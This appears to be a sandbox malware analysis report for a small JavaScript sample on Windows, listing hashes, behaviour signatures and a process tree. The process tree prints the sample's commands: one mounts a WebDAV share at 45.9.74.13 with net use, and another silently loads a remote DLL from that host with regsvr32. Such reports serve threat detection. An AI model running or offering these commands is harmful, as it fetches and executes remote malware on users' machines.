Analysis
-
max time kernel
120s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
10/07/2024, 01:20
Static task
static1
Behavioral task
behavioral1
Sample
35d2889af3a9be098a0b7cbfc7c980a02107f296c7f1198ff611550176a47269.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
35d2889af3a9be098a0b7cbfc7c980a02107f296c7f1198ff611550176a47269.js
Resource
win10v2004-20240709-en
General
-
Target
35d2889af3a9be098a0b7cbfc7c980a02107f296c7f1198ff611550176a47269.js
-
Size
5KB
-
MD5
bb7d06e250f185a819e9b7c40ae391ce
-
SHA1
7ba3f83334a174068ae2a91499a2b565396c208c
-
SHA256
35d2889af3a9be098a0b7cbfc7c980a02107f296c7f1198ff611550176a47269
-
SHA512
5be433eb1ae7b258485eb6ade575b59ef96bc23e1a21bc95248d861b9413ef24b69e3b6ebfe2ebf659f7caba8b8d3d183da5a383f7319e773bb0bbcfe31b45d4
-
SSDEEP
96:ZpvV2Cc0M0uCTL7A5jtvuchFotgpcAxoQRAjxXCkeJ:rvV2D0M0uCOZuUlTRxkw
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2628 regsvr32.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 1692 wrote to memory of 2392 1692 wscript.exe 30 PID 1692 wrote to memory of 2392 1692 wscript.exe 30 PID 1692 wrote to memory of 2392 1692 wscript.exe 30 PID 2392 wrote to memory of 1492 2392 cmd.exe 33 PID 2392 wrote to memory of 1492 2392 cmd.exe 33 PID 2392 wrote to memory of 1492 2392 cmd.exe 33 PID 2392 wrote to memory of 2628 2392 cmd.exe 34 PID 2392 wrote to memory of 2628 2392 cmd.exe 34 PID 2392 wrote to memory of 2628 2392 cmd.exe 34 PID 2392 wrote to memory of 2628 2392 cmd.exe 34 PID 2392 wrote to memory of 2628 2392 cmd.exe 34
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\35d2889af3a9be098a0b7cbfc7c980a02107f296c7f1198ff611550176a47269.js1⤵
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\35d2889af3a9be098a0b7cbfc7c980a02107f296c7f1198ff611550176a47269.js" "C:\Users\Admin\\ttsmrg.bat" && "C:\Users\Admin\\ttsmrg.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:1492
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\593.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2628
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5bb7d06e250f185a819e9b7c40ae391ce
SHA17ba3f83334a174068ae2a91499a2b565396c208c
SHA25635d2889af3a9be098a0b7cbfc7c980a02107f296c7f1198ff611550176a47269
SHA5125be433eb1ae7b258485eb6ade575b59ef96bc23e1a21bc95248d861b9413ef24b69e3b6ebfe2ebf659f7caba8b8d3d183da5a383f7319e773bb0bbcfe31b45d4